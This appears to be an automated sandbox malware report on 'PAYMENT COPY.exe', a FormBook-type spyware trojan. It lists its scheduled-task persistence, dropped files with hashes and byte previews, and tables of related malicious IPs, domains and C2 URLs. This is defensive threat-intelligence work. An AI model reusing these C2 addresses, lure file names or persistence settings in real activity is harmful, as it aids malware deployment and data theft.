Classification:	mal100.troj.spyw.evad.winEXE@25/14@16/13
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 93% Number of executed functions: 140 Number of non-executed functions: 302
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target JBOkmqufMEGwlAXNwkIjNoQeH.exe, PID 3784 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:19:39	API Interceptor	2x Sleep call for process: PAYMENT COPY.exe modified
06:19:41	API Interceptor	34x Sleep call for process: powershell.exe modified
06:19:45	API Interceptor	2x Sleep call for process: bQrgcvrrXfGN.exe modified
06:20:35	API Interceptor	11118104x Sleep call for process: gpresult.exe modified
12:19:41	Task Scheduler	Run new task: bQrgcvrrXfGN path: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	USD46k Swift_PDF.exe	Get hash	malicious	FormBook	Browse	www.oreh.net/even/
	w5c8CHID77.exe	Get hash	malicious	Unknown	Browse	crovace.com/images/1/filenames.php
	http://domclickext.xyz	Get hash	malicious	Unknown	Browse	domclickext.xyz/lander
	P240842_P240843.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.5redbull.com/ht3d/?_Td4vT=ZL3P5PGPdr&LjqdxdN0=ySrzTuqbYiyLAwBY6em+9ZmTsohlgC2Wb5uHAaPcVSTcIXHVq5qBaAngv1HA17NCZbzO
	narud#U017ebenicu 018BH2024.exe	Get hash	malicious	FormBook	Browse	www.playtoown.shop/dd20/?FRcPAJY=z+kmDmqXOSaonEhRZs5Wl2PzvdAdpd9CMMNx8+wPdH51C9fUA+EkzIY35EvCfc9TN9UxgbNWJQ==&KXiD2=yvwhLLV07x4hUne0
	8VRN7Hjoig.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.nativegarden.net/ht3d/?9r4P2=wUVaOlJZblJdDdMRjLfemxLLWBRd24us117/s2Iam/T8vs3Es0GOt4bvK3USgri2KA/F&wDH=FtxdAxlh54YtUPG0
	Forligsmnd.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.unbiasedresearch.org/gu1b/
	ZIMUXIA8376.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cma-graphic.com/jn17/?SP=6lHhpfe8&tVg8=9Ou77NL77p8F9HiORCSmxznYIzrQQFBu1yiqfrAP/QJp1599Ec6KdUgdoqegsJyahEvf
	hj3YCvtlg7.exe	Get hash	malicious	FormBook	Browse	www.owletbaby.shop/vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL
	Purchase Order#44231.exe	Get hash	malicious	FormBook	Browse	www.owletbaby.shop/vr01/?DVo0=YlUPPT_xC8f&tXR=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL
136.143.186.12	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	www.jrksa.info/nq8t/
	z99Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	www.sinpercar.com/ewzn/?AfE=EyRqAwwT05x65m/38S7UcLqbbN3UVnxK+wcuGdQYbEhrNA0VrW3zgm6HwQ8b+SGfrDA2jpiQna5wuS+JvhaLr4daouyBMWls9Q==&hDmL=Vbxhs6
	Solicitud_de_cotizacion.exe	Get hash	malicious	FormBook	Browse	www.sinpercar.com/ewzn/?yl5tw=e4elEdCHk&ubRHX=EyRqAwwT05x65m/05S7qd6qUG8bqCUZK+wcuGdQYbEhrNA0VrW3zgm6HwQ8b+SGfrDA2jpiQna5wuS+JvhaOhfhKsYm/blZJ8A==
	z17Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	www.sinpercar.com/ewzn/?iHHH=EyRqAwwT05x65m/38S7UcLqbbN3UVnxK+wcuGdQYbEhrNA0VrW3zgm6HwQ8b+SGfrDA2jpiQna5wuS+JvhaLr4daouyBMWls9Q==&Yn5l=8n1PFtVH
	3Xq2C4NXet.exe	Get hash	malicious	FormBook	Browse	www.lorriewisemandover.com/e28o/?ATRP5bN=lzqZi2zDhr45QvVL0Wowx7cC2vfgLC/0aeqflcFBcMxdZfK6oIJnDuftThWR4X6Zm5AD&8p-=ejrddJAX3d-L7hG
	#U4e5d#U6708#U58f0#U660e_40981677.xls	Get hash	malicious	FormBook	Browse	www.ikkasolutions.com/rs10/?v4rHvZ=w6smRJLf7toRM37PveJYJoQG3FAEgiXhsh+ewBNr2VQF5XhnGTEUJIksPhSKQXlh0IN1YQ==&9rQtJ=qzup7FjH1rfp6
	bank_transfer_form_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.cdicontrols.com/sn26/?JB4TTn=+8/OTAxeZ4oa1Wh6yxT3z/h6FaMY50WO3WlmqTLnPm5xHZPrytJdhEUwK9zNA7FOGrhM&r0=Z0G8Tj7hq8g
	docswiftusd.exe	Get hash	malicious	FormBook	Browse	www.cdicontrols.com/sn26/?BZ=+8/OTAwvFPpqoW4FuBT3z/h6FaMY50WO3WlmqTLnPm5xHZPrytJdhEUwK9nNKb1NA+pM&_jRxvb=hBjlWlB0JVu
	ORDER#60541_PDF.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.cdicontrols.com/sn26/?_jqHu=gdWT4r-hH8&Rl5=+8/OTAxZb40aom0EzhT3z/h6FaMY50WO3WlmqTLnPm5xHZPrytJdhEUwK+ndF/Z2HLFM
	SecuriteInfo.com.Win32.DropperX-gen.20545.21398.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.sinpercar.com/ehgc/?zF1kGB=2QAj&MYGFUUBf=ASIOfsPVkYMe0mDhMW/AbIwmXGWHRQPkqZ+W/YAY4f78p6eXohj6HjxTkBq7iSqIdAPTRAaD73JbzwVrkT86c29Qe9YDDb3suQ==
89.42.218.92	bin.exe	Get hash	malicious	FormBook	Browse	www.mediciconstanta.ro/1nj8/
172.67.137.210	quote.exe	Get hash	malicious	FormBook	Browse	www.drednents.es/z86o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.spotgush.top	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	66.29.149.46
www.drdavidglassman.com	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
www.drednents.es	quotation.exe	Get hash	malicious	FormBook	Browse	104.21.81.34
	Payment invoice.exe	Get hash	malicious	FormBook	Browse	104.21.81.34
	quote.exe	Get hash	malicious	FormBook	Browse	172.67.137.210
	SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exe	Get hash	malicious	FormBook	Browse	104.21.81.34
www.pinpointopia.com	Swift_USD103,700.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
www.skinut-ves.ru	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	31.31.198.106
zhs.zohosites.com	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	z99Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	Solicitud_de_cotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	z17Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	3Xq2C4NXet.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	Product_Specs.exe	Get hash	malicious	FormBook, GuLoader	Browse	136.143.180.12
	#U4e5d#U6708#U58f0#U660e_40981677.xls	Get hash	malicious	FormBook	Browse	136.143.186.12
	bank_transfer_form_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	136.143.186.12
	docswiftusd.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	ORDER#60541_PDF.exe	Get hash	malicious	FormBook, NSISDropper	Browse	136.143.186.12

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROMARGRO	bin.exe	Get hash	malicious	FormBook	Browse	89.42.218.92
	http://sobeteracotafancris.ro	Get hash	malicious	Unknown	Browse	89.42.218.138
	SecuriteInfo.com.Win32.CrypterX-gen.13367.14994.exe	Get hash	malicious	AgentTesla	Browse	89.42.218.12
	https://atsginc.com@google.co.uk/%61%6D%70/%73/%F0%9F%84%B8%F0%9F%85%82.%E2%93%96%E2%93%93/zAtZ30%23anastassiya.gainey@atsginc.com	Get hash	malicious	HTMLPhisher	Browse	89.42.218.211
	https://dish.com@google.co.uk/%61%6D%70/%73/%F0%9F%84%B8%F0%9F%85%82.%E2%93%96%E2%93%93/zAtZ30%23audra.ritter@dish.com	Get hash	malicious	HTMLPhisher	Browse	89.42.218.211
	http://https:lcatterton.com@google.co.uk/%61%6D%70/%73/%F0%9F%84%B8%F0%9F%85%82.%E2%93%96%E2%93%93/zAtZ30%23amanda.materasso@lcatterton.com	Get hash	malicious	HTMLPhisher	Browse	89.42.218.211
	ZNGMn9IDJX.exe	Get hash	malicious	FormBook	Browse	89.42.218.12
	doc20240503125126.bat	Get hash	malicious	Unknown	Browse	89.42.218.173
	EGpGxFlJO8.exe	Get hash	malicious	Glupteba, Mars Stealer, SmokeLoader, Stealc, Vidar	Browse	185.162.66.42
	https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=hqpa.ro/directory/new/sUMLddwTKRzwJMyZTnvsUYryIVslMUyunvgubzYRIvANpyvNzb/lariat_ads@baylor.edu	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	89.40.72.238
AMAZON-02US	cmd.aarch64.elf	Get hash	malicious	Mirai, Moobot	Browse	34.243.160.129
	https://docsend.com/view/qqrrvyqndwsixgqg	Get hash	malicious	Phisher	Browse	99.86.229.55
	https://url.za.m.mimecastprotect.com/s/dkSWC8qYY1u9oZr4unuoBl?domain=t.co	Get hash	malicious	Unknown	Browse	54.231.171.249
	s0OthAxkuM.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.171.230.55
	vivRdiJAQw.elf	Get hash	malicious	Gafgyt, Mirai	Browse	34.243.160.129
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	54.241.153.192
	#U0426#U0438#U0442#U0430#U0442#U0430.exe	Get hash	malicious	FormBook	Browse	18.143.129.199
	https://paypalgiftcardgenerator.pages.dev/	Get hash	malicious	Unknown	Browse	18.156.141.44
	lrZL6K5Idl.exe	Get hash	malicious	Njrat	Browse	108.132.8.18
	https://fix-to-all-issues-review-verification-form-aa-submit-wheat.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	76.76.21.9
ZOHO-ASUS	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	file.exe	Get hash	malicious	CMSBrute	Browse	204.141.43.44
	SlHgSOYcMY.exe	Get hash	malicious	Unknown	Browse	204.141.43.44
	SecuriteInfo.com.Trojan.DownLoader46.63573.25866.32524.exe	Get hash	malicious	Remcos, AgentTesla, DBatLoader	Browse	204.141.42.56
	https://classic.dreamclass.io/pages/admissions/form/Bvtxck	Get hash	malicious	Unknown	Browse	204.141.33.48
	http://greatmanagerinstitute.com	Get hash	malicious	Unknown	Browse	136.143.190.97
	https://workdrive.zohoexternal.com/external/2c63de0fdd4c89e3b1929ff054753df29586989db597aec11b0424839e9707da/download	Get hash	malicious	Unknown	Browse	136.143.190.180
	https://survey.zohopublic.eu/zs/GzDXvp	Get hash	malicious	HTMLPhisher	Browse	136.143.191.104
	http://geoguesser.com/seterra/en-an/vpg/3800	Get hash	malicious	Unknown	Browse	136.143.190.97
	https://site24x7.com	Get hash	malicious	Unknown	Browse	136.143.190.97
NETMAGIC-APNetmagicDatacenterMumbaiIN	m2PQz5E1Zv.elf	Get hash	malicious	Mirai	Browse	180.179.125.117
	NnS9ImJPht.elf	Get hash	malicious	Unknown	Browse	203.95.216.191
	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	103.143.46.83
	M0akqPlgtl.elf	Get hash	malicious	Mirai	Browse	180.179.125.122
	sEzW1OZkw1.elf	Get hash	malicious	Gafgyt, Mirai	Browse	103.214.114.32
	NowYibgc2B.elf	Get hash	malicious	Gafgyt, Mirai	Browse	103.214.114.18
	LF6B2XTwcV.elf	Get hash	malicious	Gafgyt, Mirai	Browse	103.214.114.33
	3RIodZx5Hr.elf	Get hash	malicious	Mirai, Okiru	Browse	180.179.107.104
	TJoFRT42dh.elf	Get hash	malicious	Mirai	Browse	103.227.39.77
	CtEeMS3H62.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, Vidar	Browse	103.143.46.143

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.376461045162101
Encrypted:	false
SSDEEP:	48:lylWSeR4y4RQmFoUe4mfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLXyIFKLJIZ2KRH9Oug8s
MD5:	DD468C0F7F5C01E4D8F8142ED1D260D8
SHA1:	6E5D9DE3ACCC5A2694B9EFE13364F2421B4D3092
SHA-256:	1A1EEDA1B30E20F3F708B835546D15CAB938E80C02BF59A788B42F83DCE7C7F0
SHA-512:	F8959ABC252CDADBD318752AA12CE2D27D5B388F720BCCE0F2B316FC13625EB8EFABC002ADF65A86CA15387F60B66EEE71F314985DB9F0FCEAB8BD5C5D36C215
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................~..2K..}...0........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\4jm-6-hL7

Download File

Process:	C:\Windows\SysWOW64\gpresult.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1220068301579391
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8JoudpfjOLl:aq+n0E9ELyKOMq+8qu3SJ
MD5:	87EE0BBB38B11E14090EF60A7D56C8B1
SHA1:	37966F94007814B687989937B4A299FA816581ED
SHA-256:	22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
SHA-512:	37572D4B5A336BC8220B9CF64F8F2D6041C68A449C582221C5C62A3BA1D8D4CA5C241C9383038EBF3D2787CF4AB9F7370E1A3C4AC7D6EC0A942FC41CD7917266
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mebfolc.liw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uzprlt2.ptq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqhej52h.2qy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfot3gfl.h2a.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtxbro3o.ale.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl53tnli.vg4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z55jwqv5.y2t.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztmcufib.3lt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1D60.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.109162499820361
Encrypted:	false
SSDEEP:	24:2di4+S2qh51Ny1miUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtHwxvn:cge5QYrFdOFzOzN33ODOiDdKrsuTHAv
MD5:	6C8A7DAC2ACC860681126F79A467C74F
SHA1:	5E16E7AC402411D848EF7F0E2D7462E126C6D028
SHA-256:	23CBD5EF3B8AE1812168A5C6841CB84AB82F2B485793F4A450DC2AC8C903286E
SHA-512:	A54949E4370B405099E18D4B5980F21B5CD845518B3DA700DD4649E332DFFA2F0CAE340282A04612450AC771EC465701A41655F54DA63D02BEEB550174ED943E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp525.tmp

Download File

Process:	C:\Users\user\Desktop\PAYMENT COPY.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.109162499820361
Encrypted:	false
SSDEEP:	24:2di4+S2qh51Ny1miUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtHwxvn:cge5QYrFdOFzOzN33ODOiDdKrsuTHAv
MD5:	6C8A7DAC2ACC860681126F79A467C74F
SHA1:	5E16E7AC402411D848EF7F0E2D7462E126C6D028
SHA-256:	23CBD5EF3B8AE1812168A5C6841CB84AB82F2B485793F4A450DC2AC8C903286E
SHA-512:	A54949E4370B405099E18D4B5980F21B5CD845518B3DA700DD4649E332DFFA2F0CAE340282A04612450AC771EC465701A41655F54DA63D02BEEB550174ED943E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Download File

Process:	C:\Users\user\Desktop\PAYMENT COPY.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	704000
Entropy (8bit):	7.971333507467772
Encrypted:	false
SSDEEP:	12288:gxgyzi8LkpEaXE69uKAq5swzUfUUuAmwopvJMEe2l0BwnAwbPysHIC62MvNZS:cT2jEmD9uKb5sFDuiX9GjnAqqz0
MD5:	A05649B0D742E857FC002AC0B7759512
SHA1:	84051AF6ED4AEC8F1209D5F7EAD77F20B8BFFC2B
SHA-256:	94AD0E1F81C61142471FFD1CBC66CAF209D43AA514702033728A51E672702D6C
SHA-512:	2ED1D7B4ACDAE4AF17D96EB55A631B5965E011E326777698A9E598657A0EBAC7A6769F05E73FDFE34E7F54967F89E83F148C3C8786018E8A6313CCAC422A8927
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....yMf..............0.................. ........@.. ....................... ............@.....................................O.......h............................................................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........M..H<......;...\...X>............................................s....}.....s....}.....s....}.....r...p}.....(.....(.......0..E.......s......r...po.....r...po.....rq..po.....r...po.....o.....@.....o......o......{.....o ....o....(!.......(.....s".....r...p..+,.{......o#...&....G...%..,.o$.........i}......o%...%..-..{....o&.....r...p..('...r...p((......{......o ....{.....o)....{....r...po ......(........,...o.....)..r...p..o+...(,...rM..p.........(-...&..*.........t.

C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PAYMENT COPY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.971333507467772
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PAYMENT COPY.exe
File size:	704'000 bytes
MD5:	a05649b0d742e857fc002ac0b7759512
